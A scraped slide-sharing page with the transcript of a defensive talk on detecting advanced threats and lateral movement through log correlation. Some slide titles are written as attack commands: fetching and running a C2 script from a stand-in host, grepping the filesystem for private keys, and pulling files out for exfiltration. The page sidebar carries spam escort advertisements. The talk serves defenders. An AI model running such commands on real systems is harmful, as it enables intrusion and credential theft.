Physically Unclonable Random PermutationsPhysically Unclonable Random Permutations
Physically Unclonable Random Permutations
 

Similar to Advanced Threats and Lateral Movement Detection

ISACA Ethical Hacking Presentation 10/2011
ISACA Ethical Hacking Presentation 10/2011ISACA Ethical Hacking Presentation 10/2011
ISACA Ethical Hacking Presentation 10/2011Xavier Mertens
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsFaithWestdorp
 
Threat Hunting by Falgun Rathod - Cyber Octet Private Limited
Threat Hunting by Falgun Rathod - Cyber Octet Private LimitedThreat Hunting by Falgun Rathod - Cyber Octet Private Limited
Threat Hunting by Falgun Rathod - Cyber Octet Private LimitedFalgun Rathod
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
Chapter 15 incident handling
Chapter 15 incident handlingChapter 15 incident handling
Chapter 15 incident handlingnewbie2019
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...EC-Council
 
FireSIGHT Management Center (FMC) slides
FireSIGHT Management Center (FMC) slidesFireSIGHT Management Center (FMC) slides
FireSIGHT Management Center (FMC) slidesAmy Gerrie
 
Honeypots for Active Defense
Honeypots for Active DefenseHoneypots for Active Defense
Honeypots for Active DefenseGreg Foss
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksAll Things Open
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Chris Gates
 
Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Claus Cramon Houmann
 
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseSANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseJohn Bambenek
 
Ethical hacking and cyber security intro
Ethical hacking and cyber security introEthical hacking and cyber security intro
Ethical hacking and cyber security introAbhilash Ak
 
Security Breakout Session
Security Breakout Session Security Breakout Session
Security Breakout Session Splunk
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion DetectionAPNIC
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityClaus Cramon Houmann
 
The Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security AnalyticsThe Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security AnalyticsDemetrio Milea
 
building foundation for ethical hacking.ppt
building foundation for ethical hacking.pptbuilding foundation for ethical hacking.ppt
building foundation for ethical hacking.pptShivaniSingha1
 
Segmenting your Network for Security - The Good, the Bad and the Ugly
Segmenting your Network for Security - The Good, the Bad and the UglySegmenting your Network for Security - The Good, the Bad and the Ugly
Segmenting your Network for Security - The Good, the Bad and the UglyAlgoSec
 

Similar to Advanced Threats and Lateral Movement Detection (20)

ISACA Ethical Hacking Presentation 10/2011
ISACA Ethical Hacking Presentation 10/2011ISACA Ethical Hacking Presentation 10/2011
ISACA Ethical Hacking Presentation 10/2011
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
 
Threat Hunting by Falgun Rathod - Cyber Octet Private Limited
Threat Hunting by Falgun Rathod - Cyber Octet Private LimitedThreat Hunting by Falgun Rathod - Cyber Octet Private Limited
Threat Hunting by Falgun Rathod - Cyber Octet Private Limited
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Chapter 15 incident handling
Chapter 15 incident handlingChapter 15 incident handling
Chapter 15 incident handling
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
 
FireSIGHT Management Center (FMC) slides
FireSIGHT Management Center (FMC) slidesFireSIGHT Management Center (FMC) slides
FireSIGHT Management Center (FMC) slides
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hacking
 
Honeypots for Active Defense
Honeypots for Active DefenseHoneypots for Active Defense
Honeypots for Active Defense
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
 
Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2
 
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseSANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
 
Ethical hacking and cyber security intro
Ethical hacking and cyber security introEthical hacking and cyber security intro
Ethical hacking and cyber security intro
 
Security Breakout Session
Security Breakout Session Security Breakout Session
Security Breakout Session
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricality
 
The Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security AnalyticsThe Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security Analytics
 
building foundation for ethical hacking.ppt
building foundation for ethical hacking.pptbuilding foundation for ethical hacking.ppt
building foundation for ethical hacking.ppt
 
Segmenting your Network for Security - The Good, the Bad and the Ugly
Segmenting your Network for Security - The Good, the Bad and the UglySegmenting your Network for Security - The Good, the Bad and the Ugly
Segmenting your Network for Security - The Good, the Bad and the Ugly
 

More from Greg Foss

Cloud Crime Ops
Cloud Crime OpsCloud Crime Ops
Cloud Crime OpsGreg Foss
 
Future of Destructive Malware
Future of Destructive MalwareFuture of Destructive Malware
Future of Destructive MalwareGreg Foss
 
Crypto Hacks - Quit your Job and Become a Crypto Farmer
Crypto Hacks - Quit your Job and Become a Crypto FarmerCrypto Hacks - Quit your Job and Become a Crypto Farmer
Crypto Hacks - Quit your Job and Become a Crypto FarmerGreg Foss
 
PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018Greg Foss
 
Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Greg Foss
 
Security Automation and Orchestration
Security Automation and OrchestrationSecurity Automation and Orchestration
Security Automation and OrchestrationGreg Foss
 
Activated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint DataActivated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint DataGreg Foss
 
SecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture TrainingSecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture TrainingGreg Foss
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksGreg Foss
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014Greg Foss
 
Attacking Drupal
Attacking DrupalAttacking Drupal
Attacking DrupalGreg Foss
 

More from Greg Foss (11)

Cloud Crime Ops
Cloud Crime OpsCloud Crime Ops
Cloud Crime Ops
 
Future of Destructive Malware
Future of Destructive MalwareFuture of Destructive Malware
Future of Destructive Malware
 
Crypto Hacks - Quit your Job and Become a Crypto Farmer
Crypto Hacks - Quit your Job and Become a Crypto FarmerCrypto Hacks - Quit your Job and Become a Crypto Farmer
Crypto Hacks - Quit your Job and Become a Crypto Farmer
 
PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018
 
Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17
 
Security Automation and Orchestration
Security Automation and OrchestrationSecurity Automation and Orchestration
Security Automation and Orchestration
 
Activated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint DataActivated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint Data
 
SecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture TrainingSecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture Training
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot Attacks
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
 
Attacking Drupal
Attacking DrupalAttacking Drupal
Attacking Drupal
 

Recently uploaded

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 

Recently uploaded (20)

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 

Advanced Threats and Lateral Movement Detection

  • 1. Advanced  Threats  &  Lateral  Movement  Detec5on   Greg  Foss   OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH   Sr.  Security  Research  Engineer   LogRhythm  Labs  
  • 2. #  whoami   •  Greg  Foss   •  Sr.  Security  Researcher   •  LogRhythm  Labs  –  Threat  Intel  Team   •  Former  DOE  PenetraEon  Tester   •  Focus  =>  Honeypots,  Incident  Response,  and  Red  Team   •  OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH,  etc…   2  
  • 3. #  ls  -­‐lha   IT  Security  Threats   Event  CorrelaEon   DetecEon   DEMO!   1   2   3   4   3  
  • 5. #  man  [Advanced  Threats]   •  Advanced  Persistent  Threats   •  Organized  Cyber  Crime   •  Hack5vists   •  ‘Cyber  Terrorists’   •  Etc…   •  Able  to  develop  and  uElize  sophisEcated  techniques  in  pursuit  of  their  target  objecEve  from   reconnaissance  to  data  exfiltraEon.   •  Will  leverage  the  full  spectrum  of  aWack  vectors  –  social,  technical,  physical,  etc.   •  Highly  organized,  highly  moEvated,  highly  resourced.       •  Willing  to  invest  significant  Eme  and  resources  to  compromise.   5  
  • 6. It’s  when,  not  if…   •  Mission  Oriented   •  Persistent  an  Driven   •  PaEent  and  Methodical   •  Focus  on  exponenEal  ROI   •  Emphasis  on  high  IP  value  targets   •  They  will  get  in…   6   Image:  hWp://pos^iles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg  
  • 8. Ok,  for  real…   •  *Simple…  Correlate  on  odd  network  /  host  ac5vity   •  Use  the  data  at  hand  to  acEvely  detect  anomalies   •  Understand  how  your  organizaEon  will  respond  to  a  breach  /   outage  /  squirrel  affecEng  any  of  the  three  InfoSec  pillars     •  Confiden5ality   •  Integrity   •  Availability   8  
  • 9. Advanced  Threat  Tac5cs  and  Evasion   •  Threat  actors  of  all  types  move  slowly  and  quietly  over  Eme.   LimiEng  exposure  and  potenEal  for  discovery.   •  Trending  on  enterprise  data  over  Eme  helps  to  build  baselines   that  can  be  used  to  ac5vely  iden5fy  anomalies.   9  
  • 11. #  last  &&  echo  ‘How  are  they  geYng  in??’   •  Phishing   •  91%  of  ‘advanced’  aWacks  began  with  a  phishing  email  or   similar  social  engineering  tacEcs.   •  hWp://www.infosecurity-­‐magazine.com/view/29562/91-­‐of-­‐apt-­‐aWacks-­‐ start-­‐with-­‐a-­‐spearphishing-­‐email/     •  2014  Metrics   •  Average  cost  per  breach  =>  $3.5  million   •  15%  Higher  than  the  previous  year   •  hWp://www.ponemon.org/blog/ponemon-­‐insEtute-­‐releases-­‐2014-­‐cost-­‐ of-­‐data-­‐breach-­‐global-­‐analysis     11  
  • 12. #  last  &&  echo  ‘How  are  they  geYng  in??’   •  Phishing   •  91%  of  ‘advanced’  aWacks  began  with  a  phishing  email  or   similar  social  engineering  tacEcs.   •  hWp://www.infosecurity-­‐magazine.com/view/29562/91-­‐of-­‐apt-­‐aWacks-­‐ start-­‐with-­‐a-­‐spearphishing-­‐email/     •  2014  Metrics   •  Average  cost  per  breach  =>  $3.5  million   •  15%  Higher  than  the  previous  year   •  hWp://www.ponemon.org/blog/ponemon-­‐insEtute-­‐releases-­‐2014-­‐cost-­‐ of-­‐data-­‐breach-­‐global-­‐analysis     12  
  • 13. #  history  |  more   •  It  only  takes  one…   13  
  • 14. #  ./searchsploit  ‘client  side’  &&  echo  ‘new  exploits  daily!’   14  
  • 15. #  cat  [cve-­‐2014-­‐6332]  >>  /var/www/pwn-­‐IE.html   15  
  • 16. Event  Correla5on  &  Detec5on   16  
  • 19. Phishing  Aback  Log  Traces   19  
  • 20. $  vim  next.sh   •  Maintain  Access…   20   Image:  hWp://www.netresec.com/images/back_door_open_300x200.png  
  • 21. $  ./next.sh   •  Then?   •  *Nothing…   •  For  a  long  Eme…     •  *not  really*   •  They  have  aWained  a  foothold  and  are  now  your  newest  employees…   21  
  • 22. $  su  -­‐  root   22  
  • 23. #  wget  hbp://bad.stuff.net/c2.py  .  &&  ./c2.py   •  Once  infected,  the  beachhead  will  beacon  periodically   23  
  • 24. Behavioral  Analy5cs   •  Beaconing  Ac5vity  –  Usually  iniEated  over  port  443  or  an  encrypted   tunnel  over  port  80.   •  Can  be  detected  with  a  Firewall  or  Web  Proxy   •  Capability  to  decrypt  SSL  traffic  is  a  huge  plus   •  Behavioral  analy5cs  can  be  uElized  to  differenEate  normal  browsing   acEvity  from  possible  evidence  of  an  infected  host.   •  Using  a  SIEM,  track  the  unique  websites  usually  visited,  and  the  overall   volume  of  normal  web  acEvity,  on  a  per  user  and  a  per  host  basis.   •  Watch  for  significant  changes  over  an  extended  period  of  Eme.   24  
  • 25. Reconnaissance   •  Ping  sweeps,  service  discovery,  etc.  –  NO   •  Why  make  unnecessary  noise?   •  Instead  =>  access  network  shares,  web  apps,  and  services   •  Passively  gather  informaEon  using  available  resources…   25   Image:  hWp://macheads101.com/pages/pics/download_pics/mac/portscan.png  
  • 26. Lateral  Movement   •  Dump  Local  System  Hashes   •  Maybe  crack  them,  maybe  it’s  not  even  necessary…   •  Pass  the  Hash  (PtH)   •  Dump  plain  text  passwords   •  Mimikatz  -­‐-­‐  FTW!   •  Act  as  an  internal  employee  -­‐-­‐  use  legiEmate  means  to  access   resources.   26  
  • 27. Uncovering  Internal  Reconnaissance  and  Pivo5ng   •  Security  OperaEons  Goal  =>  Reduce  MTTD  and  MTTR   •  MTTD  –  Mean  Time  to  Detect   •  MTTR  –  Mean  Time  to  Respond   •  Set  Traps  =>  Honeypot  /  Honey  Token  access   •  Overt  Clues  =>  ModificaEon  of  user  /  file  /  group  permissions  and   pivoEng  evidence   •  Subtle  Clues  =>  VPN  access  from  disparate  geographical  locaEons   •  Missed  Opportuni5es  =>  Once  inside,  they  are  now  an  ‘employee’…   27  
  • 28. Lateral  Movement  Log  Traces   •  Microsos’s  granular  Event  IdenEficaEon  schema  (EVID)  in   conjuncEon  with  environment  informaEon  provides  analysts   with  plenty  of  informaEon  to  track  aWackers  once  they  have   breached  the  perimeter.   28  
  • 29. Passive  Data  Extrac5on   •  Well  Poisoning  via  UNC  Paths   •  SMB  Replay   •  Help  Desk  Tickets   •  Responder  –  By  Spider  Labs   •  Keylogging   29  
  • 30. Passive  Traffic  Analysis   •  Analyze  /  capture  anything   that  comes  across  the  wire.   •  ARP  poison  hosts  of  interest,   take  over  switches/routers,   etc.   30   Image:  hWps://i.chzbgr.com/maxW500/5579525376/h7D009AE4/  
  • 31. #  grep  –rhi  ‘private  key’  /*  &&  echo  “Iden5fy  Key  Resources”   •  Keys  /  CerEficates  /  Passwords     •  File  Shares  and  Databases   •  Intellectual  Property   •  Domain  Controllers  /  Exchange  /  etc.   •  Business  Leaders  –  CXO,  Director,  VP,  etc.     •  AdministraEve  Assistants   31   Image:  hWp://www.mobilemarkeEngwatch.com/wordpress/wp-­‐content/uploads/2011/07/Top-­‐Secret-­‐Tip-­‐To-­‐Pick-­‐SMS-­‐Keyword.jpeg  
  • 32. #  wget  hbp://target/files.tgz  &&  echo  “Data  Exfiltra5on”   •  Target  data  idenEfied,  gathered,  and  moved  out  of  the  environment.   •  Data  is  normally  leaked  in  a  ‘hidden’  or  modified  format,  rarely  is  the   actual  document  extracted.   •  Emails  and  Employee  PII   •  Intellectual  Property   •  Trade  Secrets   32   Image:  hWp://www.csee.umbc.edu/wp-­‐content/uploads/2013/04/ex.jpg  
  • 33. Data  Exfiltra5on  is  Open  Not  ‘Advanced’   33  
  • 34. Catching  Data  Exfiltra5on   •  Granular  restric5ons  on  sensi5ve  files  and  directories  to  specific   groups  or  individuals,  alert  on  any  abnormal  file  access  /  read  /   write  /  etc.     •  DNS  exfiltra5on  or  someEmes  even  ICMP  Tunneling  in  high  security   environments     •  Non-­‐SSL  over  ports  443  /  8443,  encrypted  TCP  over  ports  80  /  8080   •  Abnormal  web  server  ac5vity,  newly  created  files,  etc.   34  
  • 35. It  all  comes  down  to  Event  Correla5on   35  
  • 37. Closing  Thoughts…   •  Don’t  be  hard  on  the  outside,  sos  and  chewy  on  the  inside…   •  Implement  Layer  3  (network)  SegmentaEon  and  Least  User  Privilege   •  Understand  your  environment  and  log  data  so  that  you  can  accurately   correlate  physical  and  cyber  events   •  Implement  URL  filtering,  stateful  packet  inspecEon,  and  binary  analysis   •  AcEvely  alert  on  and  respond  at  the  earliest  signs  of  lateral  movement  and   reconnaissance  observed  within  your  environment   •  The  earlier  you  can  detect  aWackers  the  beWer…   37  
  • 38. Thank  You!   38     QUESTIONS?     Greg  Foss   OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH   Senior  Security  Research  Engineer   Greg.Foss[at]logrhythm.com   @heinzarelli